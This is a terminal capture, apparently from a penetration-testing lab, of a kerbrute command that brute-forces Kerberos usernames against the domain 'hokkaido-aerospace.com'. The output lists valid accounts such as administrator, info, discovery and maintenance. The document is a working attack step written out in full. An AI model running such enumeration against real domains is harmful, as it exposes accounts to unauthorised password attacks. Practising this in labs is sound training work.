./kerbrute_linux_amd64  userenum -d hokkaido-aerospace.com --dc hokkaido.pgp /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t 100                                

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/30/25 - Ronnie Flathers @ropnop

2025/09/30 17:43:16 >  Using KDC(s):
2025/09/30 17:43:16 >   hokkaido.pgp:88

2025/09/30 17:43:16 >  [+] VALID USERNAME:       info@hokkaido-aerospace.com
2025/09/30 17:43:17 >  [+] VALID USERNAME:       administrator@hokkaido-aerospace.com
2025/09/30 17:43:18 >  [+] VALID USERNAME:       INFO@hokkaido-aerospace.com
2025/09/30 17:43:21 >  [+] VALID USERNAME:       Info@hokkaido-aerospace.com
2025/09/30 17:43:24 >  [+] VALID USERNAME:       discovery@hokkaido-aerospace.com
2025/09/30 17:43:24 >  [+] VALID USERNAME:       Administrator@hokkaido-aerospace.com
2025/09/30 17:44:43 >  [+] VALID USERNAME:       maintenance@hokkaido-aerospace.com


usernames found:
info
administrator
discovery
maintenance